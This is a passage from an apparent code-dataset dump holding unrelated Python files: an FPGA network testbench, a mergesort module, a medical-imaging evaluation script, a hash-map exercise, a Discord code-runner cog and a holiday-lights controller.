rst,\n rxd=uart_txd,\n prescale=int(125000000/(115200*8)),\n name='uart_sink'\n )\n\n # DUT\n if os.system(build_cmd):\n raise Exception(\"Error running build command\")\n\n dut = Cosimulation(\n \"vvp -m myhdl %s.vvp -lxt2\" % testbench,\n clk=clk,\n rst=rst,\n current_test=current_test,\n\n btn=btn,\n sw=sw,\n led0_r=led0_r,\n led0_g=led0_g,\n led0_b=led0_b,\n led1_r=led1_r,\n led1_g=led1_g,\n led1_b=led1_b,\n led2_r=led2_r,\n led2_g=led2_g,\n led2_b=led2_b,\n led3_r=led3_r,\n led3_g=led3_g,\n led3_b=led3_b,\n led4=led4,\n led5=led5,\n led6=led6,\n led7=led7,\n\n phy_rx_clk=phy_rx_clk,\n phy_rxd=phy_rxd,\n phy_rx_dv=phy_rx_dv,\n phy_rx_er=phy_rx_er,\n phy_tx_clk=phy_tx_clk,\n phy_txd=phy_txd,\n phy_tx_en=phy_tx_en,\n phy_col=phy_col,\n phy_crs=phy_crs,\n phy_reset_n=phy_reset_n,\n\n uart_rxd=uart_rxd,\n uart_txd=uart_txd\n )\n\n @always(delay(4))\n def clkgen():\n clk.next = not clk\n\n phy_clk_hp = Signal(int(20))\n\n @instance\n def rx_clk_gen():\n while True:\n yield delay(int(phy_clk_hp))\n phy_rx_clk.next = not phy_rx_clk\n phy_tx_clk.next = not phy_tx_clk\n\n @instance\n def check():\n yield delay(100)\n yield clk.posedge\n rst.next = 1\n yield clk.posedge\n rst.next = 0\n yield clk.posedge\n yield delay(100)\n yield clk.posedge\n\n # testbench stimulus\n\n yield clk.posedge\n print(\"test 1: enumerate via UDP\")\n current_test.next = 1\n\n pkt = xfcp.XFCPFrame()\n pkt.path = []\n pkt.rpath = []\n pkt.ptype = 0xfe\n pkt.payload = b''\n\n test_frame = udp_ep.UDPFrame()\n test_frame.eth_dest_mac = 0x020000000000\n test_frame.eth_src_mac = 0xDAD1D2D3D4D5\n test_frame.eth_type = 0x0800\n test_frame.ip_version = 4\n test_frame.ip_ihl = 5\n test_frame.ip_dscp = 0\n test_frame.ip_ecn = 0\n test_frame.ip_length = None\n test_frame.ip_identification = 0\n test_frame.ip_flags = 2\n test_frame.ip_fragment_offset = 0\n test_frame.ip_ttl = 64\n test_frame.ip_protocol = 0x11\n test_frame.ip_header_checksum = None\n test_frame.ip_source_ip = 0xc0a80181\n test_frame.ip_dest_ip = 0xc0a80180\n test_frame.udp_source_port = 1234\n test_frame.udp_dest_port = 14000\n test_frame.payload = pkt.build_axis()\n test_frame.build()\n\n mii_source.send(b'\\x55\\x55\\x55\\x55\\x55\\x55\\x55\\xD5'+test_frame.build_eth().build_axis_fcs().data)\n\n # wait for ARP request packet\n rx_frame = None\n while rx_frame is None:\n yield clk.posedge\n rx_frame = mii_sink.recv()\n\n check_eth_frame = eth_ep.EthFrame()\n check_eth_frame.parse_axis_fcs(rx_frame.data[8:])\n check_frame = arp_ep.ARPFrame()\n check_frame.parse_eth(check_eth_frame)\n\n print(check_frame)\n\n assert check_frame.eth_dest_mac == 0xFFFFFFFFFFFF\n assert check_frame.eth_src_mac == 0x020000000000\n assert check_frame.eth_type == 0x0806\n assert check_frame.arp_htype == 0x0001\n assert check_frame.arp_ptype == 0x0800\n assert check_frame.arp_hlen == 6\n assert check_frame.arp_plen == 4\n assert check_frame.arp_oper == 1\n assert check_frame.arp_sha == 0x020000000000\n assert check_frame.arp_spa == 0xc0a80180\n assert check_frame.arp_tha == 0x000000000000\n assert check_frame.arp_tpa == 0xc0a80181\n\n # generate response\n arp_frame = arp_ep.ARPFrame()\n arp_frame.eth_dest_mac = 0x020000000000\n arp_frame.eth_src_mac = 0xDAD1D2D3D4D5\n arp_frame.eth_type = 0x0806\n arp_frame.arp_htype = 0x0001\n arp_frame.arp_ptype = 0x0800\n arp_frame.arp_hlen = 6\n arp_frame.arp_plen = 4\n arp_frame.arp_oper = 2\n arp_frame.arp_sha = 0xDAD1D2D3D4D5\n arp_frame.arp_spa = 0xc0a80181\n arp_frame.arp_tha = 0x020000000000\n arp_frame.arp_tpa = 0xc0a80180\n\n mii_source.send(b'\\x55\\x55\\x55\\x55\\x55\\x55\\x55\\xD5'+arp_frame.build_eth().build_axis_fcs().data)\n\n rx_frame = None\n while rx_frame is None:\n yield clk.posedge\n rx_frame = mii_sink.recv()\n\n check_eth_frame = eth_ep.EthFrame()\n check_eth_frame.parse_axis_fcs(rx_frame.data[8:])\n check_frame = udp_ep.UDPFrame()\n check_frame.parse_eth(check_eth_frame)\n\n print(check_frame)\n\n assert check_frame.eth_dest_mac == 0xDAD1D2D3D4D5\n assert check_frame.eth_src_mac == 0x020000000000\n assert check_frame.eth_type == 0x0800\n assert check_frame.ip_version == 4\n assert check_frame.ip_ihl == 5\n assert check_frame.ip_dscp == 0\n assert check_frame.ip_ecn == 0\n assert check_frame.ip_identification == 0\n assert check_frame.ip_flags == 2\n assert check_frame.ip_fragment_offset == 0\n assert check_frame.ip_ttl == 64\n assert check_frame.ip_protocol == 0x11\n assert check_frame.ip_source_ip == 0xc0a80180\n assert check_frame.ip_dest_ip == 0xc0a80181\n assert check_frame.udp_source_port == 14000\n assert check_frame.udp_dest_port == 1234\n\n rx_pkt = xfcp.XFCPFrame()\n rx_pkt.parse_axis(check_frame.payload.data)\n\n print(rx_pkt)\n\n assert rx_pkt.ptype == 0xff\n assert rx_pkt.path == []\n assert rx_pkt.rpath == []\n assert len(rx_pkt.payload.data) == 64\n\n pkt = xfcp.XFCPFrame()\n pkt.path = [0]\n pkt.rpath = []\n pkt.ptype = 0xfe\n pkt.payload = b''\n\n test_frame = udp_ep.UDPFrame()\n test_frame.eth_dest_mac = 0x020000000000\n test_frame.eth_src_mac = 0xDAD1D2D3D4D5\n test_frame.eth_type = 0x0800\n test_frame.ip_version = 4\n test_frame.ip_ihl = 5\n test_frame.ip_dscp = 0\n test_frame.ip_ecn = 0\n test_frame.ip_length = None\n test_frame.ip_identification = 0\n test_frame.ip_flags = 2\n test_frame.ip_fragment_offset = 0\n test_frame.ip_ttl = 64\n test_frame.ip_protocol = 0x11\n test_frame.ip_header_checksum = None\n test_frame.ip_source_ip = 0xc0a80181\n test_frame.ip_dest_ip = 0xc0a80180\n test_frame.udp_source_port = 1234\n test_frame.udp_dest_port = 14000\n test_frame.payload = pkt.build_axis()\n test_frame.build()\n\n mii_source.send(b'\\x55\\x55\\x55\\x55\\x55\\x55\\x55\\xD5'+test_frame.build_eth().build_axis_fcs().data)\n\n rx_frame = None\n while rx_frame is None:\n yield clk.posedge\n rx_frame = mii_sink.recv()\n\n check_eth_frame = eth_ep.EthFrame()\n check_eth_frame.parse_axis_fcs(rx_frame.data[8:])\n check_frame = udp_ep.UDPFrame()\n check_frame.parse_eth(check_eth_frame)\n\n print(check_frame)\n\n assert check_frame.eth_dest_mac == 0xDAD1D2D3D4D5\n assert check_frame.eth_src_mac == 0x020000000000\n assert check_frame.eth_type == 0x0800\n assert check_frame.ip_version == 4\n assert check_frame.ip_ihl == 5\n assert check_frame.ip_dscp == 0\n assert check_frame.ip_ecn == 0\n assert check_frame.ip_identification == 0\n assert check_frame.ip_flags == 2\n assert check_frame.ip_fragment_offset == 0\n assert check_frame.ip_ttl == 64\n assert check_frame.ip_protocol == 0x11\n assert check_frame.ip_source_ip == 0xc0a80180\n assert check_frame.ip_dest_ip == 0xc0a80181\n assert check_frame.udp_source_port == 14000\n assert check_frame.udp_dest_port == 1234\n\n rx_pkt = xfcp.XFCPFrame()\n rx_pkt.parse_axis(check_frame.payload.data)\n\n print(rx_pkt)\n\n assert rx_pkt.ptype == 0xff\n assert rx_pkt.path == [0]\n assert rx_pkt.rpath == []\n assert len(rx_pkt.payload.data) == 32\n\n assert mii_source.empty()\n assert mii_sink.empty()\n\n yield delay(100)\n\n yield clk.posedge\n print(\"test 1: test write and read RAM 0\")\n current_test.next = 1\n\n pkt1 = xfcp.XFCPFrame()\n pkt1.path = [0]\n pkt1.ptype = 0x12\n pkt1.payload = bytearray(struct.pack(' your_unsorted_list becomes sorted in ascending order\n \n 2nd way * Make one or more lists to main()\n * Assign them to mergesort // mergesort(your_unsorted_list)\n --> your_unsorted_list becomes sorted in ascending order\n\nChange log:\n 1.1.0 Added exception handler to ensure list only contains integers or floats\n 1.1.1 Edited author notes and made some code layout standardizing\n'''\n\ndef mergesort(my_list):\n \n # Exception handler to ensure list only contains integers or floats\n try:\n for element in my_list:\n if(not element == float(element)):\n raise ValueError\n except ValueError:\n print(\"\\nFunction mergesort only accepts lists consisting of integers or floats\\nSorting was unsuccessful!\\n\")\n else:\n split(my_list)\n\n# Splits my_list to sorted sublists\ndef split(my_list):\n \n # print(\"Split \" + str(my_list)) # Delete comment to print whenever program splits list to smaller sublists\n\n # 1 or 0 length my_list/substring is sorted\n if len(my_list) > 1:\n mid = len(my_list)//2\n left = my_list[:mid]\n right = my_list[mid:]\n \n # Recursively splits my_list until sublist reaches length of 1\n split(left)\n split(right)\n\n # Merges sorted sublists\n merge(my_list, left, right)\n\n# Merges sorted sublists\ndef merge(my_list, left, right):\n \n i = j = k = 0\n \n # If both sides have still unsorted numbers\n while i < len(left) and j < len(right):\n\n # Change to descending sort by changing '<' to '>'\n if left[i] < right[j]:\n my_list[k] = left[i]\n i += 1\n else:\n my_list[k] = right[j]\n j += 1\n k += 1\n \n # If other sublist is empty, push rest of other side to the my_list due it's already sorted \n while i < len(left):\n my_list[k] = left[i]\n i += 1\n k += 1\n while j < len(right):\n my_list[k] = right[j]\n j += 1\n k += 1\n \n # print(\"Merge \" + str(my_list)) # Delete comment to print when program merges two sublists\n\ndef main():\n print(\"Executed main from mergesort.py\")\n\nif(__name__ == '__main__'):\n main()\n","sub_path":"sorting_algorithms/mergesort/mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"555029631","text":"import logging\nfrom sklearn.metrics import roc_auc_score\nimport numpy as np\nfrom torchxrayvision import datasets as xrv_datasets\n\nimport feature_extractors\nimport models\nimport data\n\n\ndef get_test_folds_indices(dataset_length, folds):\n permutation = np.random.permutation(dataset_length)\n size = dataset_length // folds\n remainder = dataset_length % folds\n sizes = np.array([size] * folds)\n sizes[:remainder] += 1\n assert sizes.sum() == dataset_length\n points = np.cumsum(sizes)[:-1]\n split = np.split(permutation, points)\n return split\n\n\ndef partitions_generator(dataset, folds):\n test_folds_indices = get_test_folds_indices(len(dataset), folds)\n for test_indices in test_folds_indices:\n train_mapping = np.ones(len(dataset))\n for i in test_indices:\n train_mapping[i] = 0\n train_indices = np.argwhere(train_mapping == 1).flatten()\n test_indices = np.argwhere(train_mapping == 0).flatten()\n train_dataset = xrv_datasets.SubsetDataset(dataset, train_indices)\n test_dataset = xrv_datasets.SubsetDataset(dataset, test_indices)\n yield train_dataset, test_dataset\n\n\ndef main():\n d_covid19 = data.CombinedDataset()\n logging.info(f'entire dataset length is {len(d_covid19)}')\n feature_extractor = feature_extractors.NeuralNetFeatureExtractor()\n Model = models.LinearRegression\n\n for i, (train_dataset, test_dataset) in enumerate(partitions_generator(d_covid19, 10)):\n logging.info(\n f'train size {len(train_dataset)}, test size {len(test_dataset)}')\n\n features_train = feature_extractor.extract(train_dataset)\n labels_train = train_dataset.labels\n features_test = feature_extractor.extract(test_dataset)\n labels_test = test_dataset.labels\n\n model = Model()\n model.fit(features_train, labels_train)\n predictions = model.predict(features_test)\n\n performance = np.zeros(len(test_dataset.pathologies))\n\n for i in range(len(test_dataset.pathologies)):\n if np.unique(labels_test[:, i]).shape[0] > 1:\n performance[i] = roc_auc_score(labels_test[:, i],\n predictions[i][:, 1])\n\n logging.info(f'At fold {i} per class AUC is:\\n{performance}')\n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n main()\n","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"334156860","text":"class HashMap:\r\n def __init__(self, array_size):\r\n self.array_size = array_size\r\n self.array = [None for item in range(array_size)]\r\n\r\n def hash(self, key, count_collisions=0):\r\n key_bytes = key.encode()\r\n hash_code = sum(key_bytes)\r\n return hash_code + count_collisions\r\n\r\n def compressor(self, hash_code):\r\n return hash_code % self.array_size\r\n\r\n def assign(self, key, value):\r\n array_index = self.compressor(self.hash(key))\r\n current_array_value = self.array[array_index]\r\n\r\n if current_array_value is None:\r\n self.array[array_index] = [key, value]\r\n return\r\n\r\n if current_array_value[0] == key:\r\n self.array[array_index] = [key, value]\r\n return\r\n\r\n # Collision!\r\n\r\n number_collisions = 1\r\n\r\n while(current_array_value[0] != key):\r\n new_hash_code = self.hash(key, number_collisions)\r\n new_array_index = self.compressor(new_hash_code)\r\n current_array_value = self.array[new_array_index]\r\n\r\n if current_array_value is None:\r\n self.array[new_array_index] = [key, value]\r\n return\r\n\r\n if current_array_value[0] == key:\r\n self.array[new_array_index] = [key, value]\r\n return\r\n\r\n number_collisions += 1\r\n\r\n return\r\n\r\n def retrieve(self, key):\r\n array_index = self.compressor(self.hash(key))\r\n possible_return_value = self.array[array_index]\r\n\r\n if possible_return_value is None:\r\n return None\r\n\r\n if possible_return_value[0] == key:\r\n return possible_return_value[1]\r\n\r\n retrieval_collisions = 1\r\n\r\n while (possible_return_value != key):\r\n new_hash_code = self.hash(key, retrieval_collisions)\r\n retrieving_array_index = self.compressor(new_hash_code)\r\n possible_return_value = self.array[retrieving_array_index]\r\n\r\n if possible_return_value is None:\r\n return None\r\n\r\n if possible_return_value[0] == key:\r\n return possible_return_value[1]\r\n\r\n #number_collisions += 1\r\n\r\n return\r\n\r\nhash = HashMap(20)\r\n\r\nhash.assign('amazon', 'google')\r\nhash.assign('google', 'facebook')\r\nhash.assign('facebook', 'amazon')\r\n\r\n#print(hash.retrieve('amazon'))\r\n#print(hash.retrieve('google'))\r\n#print(hash.retrieve('facebook'))\r\n\r\nclass Node:\r\n def __init__(self, value):\r\n self.value = value\r\n self.next_node = None\r\n\r\n def get_value(self):\r\n return self.value\r\n\r\n def get_next_node(self):\r\n return self.next_node\r\n\r\n def set_next_node(self, next_node):\r\n self.next_node = next_node\r\n\r\n\r\nclass LinkedList:\r\n def __init__(self, head_node=None):\r\n self.head_node = head_node\r\n\r\n def insert(self, new_node):\r\n current_node = self.head_node\r\n\r\n if not current_node:\r\n self.head_node = new_node\r\n\r\n while (current_node):\r\n next_node = current_node.get_next_node()\r\n if not next_node:\r\n current_node.set_next_node(new_node)\r\n current_node = next_node\r\n\r\n def __iter__(self):\r\n current_node = self.head_node\r\n while (current_node):\r\n yield current_node.get_value()\r\n current_node = current_node.get_next_node()\r\n\r\n\r\nflower_definitions = [\r\n['begonia', 'cautiousness'],\r\n['chrysanthemum', 'cheerfulness'],\r\n['carnation', 'memories'],\r\n['daisy', 'innocence'],\r\n['hyacinth', 'playfulness'],\r\n['lavender', 'devotion'],\r\n['magnolia', 'dignity'],\r\n['morning glory', 'unrequited love'],\r\n['periwinkle', 'new friendship'],\r\n['poppy', 'rest'],\r\n['rose', 'love'],\r\n['snapdragon', 'grace'],\r\n['sunflower', 'longevity'],\r\n['wisteria', 'good luck']\r\n]\r\n\r\nclass HashMap1:\r\n def __init__(self, size):\r\n self.array_size = size\r\n self.array = [LinkedList() for i in range(self.array_size)]\r\n\r\n def hash(self, key):\r\n key_bytes = key.encode()\r\n return sum(key_bytes)\r\n\r\n def compress(self, hash_code):\r\n return hash_code % self.array_size\r\n\r\n def assign(self, key, value):\r\n array_index = self.compress(self.hash(key))\r\n #self.array[array_index] = [key, value]\r\n payload = Node([key, value])\r\n list_at_array = self.array[array_index]\r\n\r\n for item in list_at_array:\r\n if key == item[0]:\r\n item[1] = value\r\n\r\n list_at_array.insert(payload)\r\n\r\n\r\n def retrieve(self, key):\r\n array_index = self.compress(self.hash(key))\r\n list_at_index = self.array[array_index]\r\n\r\n for item in list_at_index:\r\n if item[0] == key:\r\n return item[1]\r\n\r\n return None\r\n\r\nblossom = HashMap1(len(flower_definitions))\r\n\r\nfor item in flower_definitions:\r\n blossom.assign(item[0], item[1])\r\n\r\nprint(blossom.retrieve('morning glory'))","sub_path":"Hash.py","file_name":"Hash.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"185417639","text":"from functools import cache\nimport discord\nfrom discord.ext import commands\nfrom jishaku.codeblocks import codeblock_converter, Codeblock\nimport aiohttp\nfrom .backend.paginator.paginator import paginator, input\nfrom discord.ext.commands import BucketType\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\nclass Coding(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.rtfm_cache = {}\n\n @commands.cooldown(1, 5, BucketType.user)\n @commands.command(name=\"run\")\n async def _run(self, ctx, language, *, code: codeblock_converter):\n '''\n Run a peice of code in the given language\n '''\n timeout = aiohttp.ClientTimeout(total=60)\n with ctx.typing():\n if not code.content:\n return await ctx.error(\"Please supply some code!\", reply=True)\n query = {\n \"language\": language,\n \"source\": code[1],\n }\n async with aiohttp.ClientSession(timeout=timeout) as cs:\n async with cs.post(\"https://emkc.org/api/v1/piston/execute\", data=query) as r:\n resp = await r.json()\n\n if resp.get(\"message\", None):\n return await ctx.error(resp.get(\"message\"))\n\n else:\n if resp[\"ran\"]:\n result = resp[\"output\"].replace(\"`\", \"`\\u200b\")\n width = 2000\n pages = [result[i:i + width]\n for i in range(0, len(result), width)]\n\n embeds = []\n for index, item in enumerate(pages):\n if index == 0:\n embed = discord.Embed(\n title=f\"Ran in {resp['language']}\", description=f\"```{code.language}\\n{item}```\", colour=self.bot.good_embed_colour)\n else:\n embed = discord.Embed(\n description=f\"```{code.language}\\n{item}```\", colour=self.bot.good_embed_colour)\n embeds.append(input(embed, None))\n embedpaginator = paginator(\n ctx, remove_reactions=True, footer=True)\n embedpaginator.add_reaction(\"\\U000023ea\", \"first\")\n embedpaginator.add_reaction(\"\\U000025c0\", \"back\")\n embedpaginator.add_reaction(\"\\U0001f5d1\", \"delete\")\n embedpaginator.add_reaction(\"\\U000025b6\", \"next\")\n embedpaginator.add_reaction(\"\\U000023e9\", \"last\")\n await embedpaginator.send(embeds)\n else:\n await ctx.reply(str(resp))\n \n\ndef setup(bot):\n bot.add_cog(Coding(bot))\n","sub_path":"bot/cogs/Coding.py","file_name":"Coding.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"60867167","text":"\nstringLength = 200\ndefaultConfig = {\n \"pattern\": \"None\",\n}\n\nfrom ha import *\nfrom ha.interfaces.neopixelInterface import *\nfrom ha.interfaces.fileInterface import *\nfrom ha.controls.holidayLightControl import *\nfrom ha.rest.restServer import *\n\n# dictionary of patterns\npatterns = {\"onPattern\": [on],\n \"offPattern\": [off],\n \"whitePattern\": [white],\n \"pinkPattern\": [pink],\n \"redPattern\": [red],\n \"orangePattern\": [orange],\n \"yellowPattern\": [yellow],\n \"greenPattern\": [green],\n \"bluePattern\": [blue],\n \"purplePattern\": [purple],\n \"cyanPattern\": [cyan],\n \"magentaPattern\": [magenta],\n \"rustPattern\": [rust],\n \"indigoPattern\": [indigo],\n \"christmasPattern\": 3*[red]+3*[green],\n \"hanukkahPattern\": 7*[blue]+3*[white],\n \"halloweenPattern\": 5*[orange]+3*[rust]+2*[purple],\n \"valentinesPattern\": 1*[white]+2*[pink]+5*[red]+2*[pink],\n \"stpatricksPattern\": [green],\n \"maydayPattern\": [red],\n \"mardigrasPattern\": 3*[purple]+3*[yellow]+3*[green],\n \"presidentsPattern\": 3*[red]+3*[white]+3*[blue],\n \"july4Pattern\": 5*[red]+5*[white]+5*[blue],\n \"bastillePattern\": 10*[red]+10*[white]+10*[blue],\n \"cincodemayoPattern\": 10*[green]+10*[white]+10*[red],\n \"easterPattern\": [yellow]+[blue]+[green]+[cyan]+[magenta],\n \"swedenPattern\": 5*[blue]+5*[yellow],\n \"canadaPattern\": 5*[red]+5*[white],\n \"fallPattern\": 5*[red]+5*[orange]+5*[rust]+5*[orange],\n \"pridePattern\": [pink]+[red]+[orange]+[yellow]+[green]+[blue]+[purple],\n \"holiPattern\": [red]+[yellow]+[blue]+[green]+[orange]+[purple]+[pink]+[magenta],\n \"maydayPattern\": [red],\n \"columbusPattern\": [green]+[white]+[red],\n \"mlkPattern\": [white]+[red]+[yellow]+[rust],\n \"spectrumPattern\": [red]+[orange]+[yellow]+[green]+[blue]+[purple],\n }\n\nstateChangeEvent = threading.Event()\n\nif __name__ == \"__main__\":\n stateChangeEvent = threading.Event()\n\n # Interfaces\n neopixelInterface = NeopixelInterface(\"neopixelInterface\", None, length=stringLength, event=stateChangeEvent)\n configData = FileInterface(\"configData\", fileName=stateDir+\"lights.conf\", event=stateChangeEvent, initialState=defaultConfig)\n\n offLights = HolidayLightControl(\"None\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"offPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"None\")\n valentinesLights = HolidayLightControl(\"Valentines day\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"valentinesPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Valentines day\")\n mardigrasLights = HolidayLightControl(\"Mardi gras\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"mardigrasPattern\"],\n animation=SparkleAnimation(rate=5))],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Mardi gras\")\n presidentsLights = HolidayLightControl(\"Presidents day\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"presidentsPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Presidents day\")\n stpatricksLights = HolidayLightControl(\"St Patricks day\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"stpatricksPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"St Patricks day\")\n maydayLights = HolidayLightControl(\"May day\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"maydayPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"May day\")\n easterLights = HolidayLightControl(\"Easter\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"easterPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Easter\")\n cincodemayoLights = HolidayLightControl(\"Cinco de Mayo\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"cincodemayoPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Cinco de mayo\")\n swedenLights = HolidayLightControl(\"Sweden day\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"swedenPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Sweden day\")\n canadaLights = HolidayLightControl(\"Canada day\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"canadaPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Canada day\")\n prideLights = HolidayLightControl(\"Gay pride\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"pridePattern\"],\n animation=SparkleAnimation(rate=3))],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Gay pride\")\n flagLights = HolidayLightControl(\"Flag day\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"presidentsPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Flag day\")\n july4Lights = HolidayLightControl(\"4th of July\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"july4Pattern\"],\n animation=SparkleAnimation(rate=1))],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"4th of july\")\n bastilleLights = HolidayLightControl(\"Bastille day\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"bastillePattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Bastille day\")\n fallLights = HolidayLightControl(\"Fall\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"fallPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Fall\")\n halloweenLights = HolidayLightControl(\"Halloween\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"halloweenPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Halloween\")\n electionLights = HolidayLightControl(\"Election day\", neopixelInterface,\n segments=[Segment(\"leftSegment\", 0, 112,\n pattern=10*[red]+10*[white]+10*[blue],\n animation=CrawlAnimation(direction=1)),\n Segment(\"centerSegment\", 112, 58,\n pattern=1*[red]+1*[white]+1*[blue],\n animation=SparkleAnimation(rate=1)),\n Segment(\"rightSegment\", 170, 173,\n pattern=10*[red]+10*[white]+10*[blue],\n animation=CrawlAnimation(direction=-1))],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Election day\")\n christmasLights = HolidayLightControl(\"Christmas\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"christmasPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Christmas\")\n hanukkahLights = HolidayLightControl(\"Hanukkah\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"hanukkahPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Hanukkah\")\n testLights = HolidayLightControl(\"Test\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"spectrumPattern\"],\n animation=CrawlAnimation(direction=1))],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Test\")\n\n holidayLightControls = Collection(\"HolidayLightControls\", resources=[offLights, valentinesLights, presidentsLights, mardigrasLights, stpatricksLights,\n easterLights, maydayLights, cincodemayoLights, swedenLights, prideLights, flagLights, canadaLights, july4Lights, bastilleLights,\n fallLights, halloweenLights, electionLights, christmasLights, hanukkahLights,\n testLights])\n # Persistent config data\n xmasTreePattern = MultiControl(\"xmasTreePattern\", configData, \"pattern\", values=list(holidayLightControls.keys()),\n group=[\"Lights\", \"Holiday\"], label=\"Xmas tree pattern\")\n\n# Tasks\n # 2019\n # holidayTasks = [\n # Task(\"OffTask\", SchedTime( hour=12, minute=0), holiday, \"None\"),\n # Task(\"valentinesTask\", SchedTime(year=2019, month=Feb, day=[13,14], hour=12, minute=0), holiday, \"Valentines day\"),\n # Task(\"presidentsTask\", SchedTime(year=2019, month=Feb, day=18, hour=12, minute=0), holiday, \"Presidents day\"),\n # Task(\"mardigrasTask\", SchedTime(year=2019, month=Mar, day=[2,3,4,5], hour=12, minute=0), holiday, \"Mardi gras\"),\n # Task(\"stpatricksTask\", SchedTime(year=2019, month=Mar, day=[16,17], hour=12, minute=0), holiday, \"St Patricks day\"),\n # Task(\"easterTask\", SchedTime(year=2019, month=Apr, day=[20,21], hour=12, minute=0), holiday, \"Easter\"),\n # Task(\"maydayTask\", SchedTime(year=2019, month=May, day=1, hour=12, minute=0), holiday, \"May day\"),\n # Task(\"cincodemayoTask\", SchedTime(year=2019, month=May, day=5, hour=12, minute=0), holiday, \"Cinco de Mayo\"),\n # Task(\"swedenTask\", SchedTime(year=2019, month=Jun, day=6, hour=12, minute=0), holiday, \"Sweden day\"),\n # Task(\"prideTask\", SchedTime(year=2019, month=Jun, day=9, hour=12, minute=0), holiday, \"Pride day\"),\n # Task(\"flagTask\", SchedTime(year=2019, month=Jun, day=14, hour=12, minute=0), holiday, \"Flag day\"),\n # Task(\"canadaTask\", SchedTime(year=2019, month=Jul, day=1, hour=12, minute=0), holiday, \"Canada day\"),\n # Task(\"july3Task\", SchedTime(year=2019, month=Jul, day=3, hour=12, minute=0), holiday, \"Presidents day\"),\n # Task(\"july4Task\", SchedTime(year=2019, month=Jul, day=4, hour=12, minute=0), holiday, \"4th of July\"),\n # Task(\"bastilleTask\", SchedTime(year=2019, month=Jul, day=14, hour=12, minute=0), holiday, \"Bastille day\"),\n # Task(\"fallTask\", SchedTime(year=2019, month=Sep, day=21, hour=12, minute=0), holiday, \"Fall\"),\n # Task(\"halloweenTask\", SchedTime(year=2019, month=Oct, day=31, hour=12, minute=0), holiday, \"Halloween\"),\n # Task(\"thanksgivingTask\", SchedTime(year=2019, month=Nov, day=28, hour=12, minute=0), holiday, \"Fall\"),\n # Task(\"christmasTask\", SchedTime(year=2019, month=Dec, hour=12, minute=0), holiday, \"Christmas\"),\n # Task(\"hanukkahTask\", SchedTime(year=2019, month=Dec, day=22, hour=12, minute=0), holiday, \"Hanukkah\"),\n # ]\n\n # Resources\n xmasTree = AliasControl(\"xmasTree\", None, holidayLightControls, xmasTreePattern, type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Xmas tree\")\n resources = Collection(\"resources\", resources=[xmasTree, xmasTreePattern])\n\n\n # Light tasks\n # resources.addRes(Task(\"xmasLightsOnSunset\", SchedTime(event=\"sunset\"), \"xmasLights\", 1, resources=resources, group=\"Lights\"))\n # resources.addRes(Task(\"xmasLightsOffMidnight\", SchedTime(hour=[23,0], minute=[00]), \"xmasLights\", 0, resources=resources, group=\"Lights\"))\n # resources.addRes(Task(\"xmasLightsOffSunrise\", SchedTime(event=\"sunrise\"), \"xmasLights\", 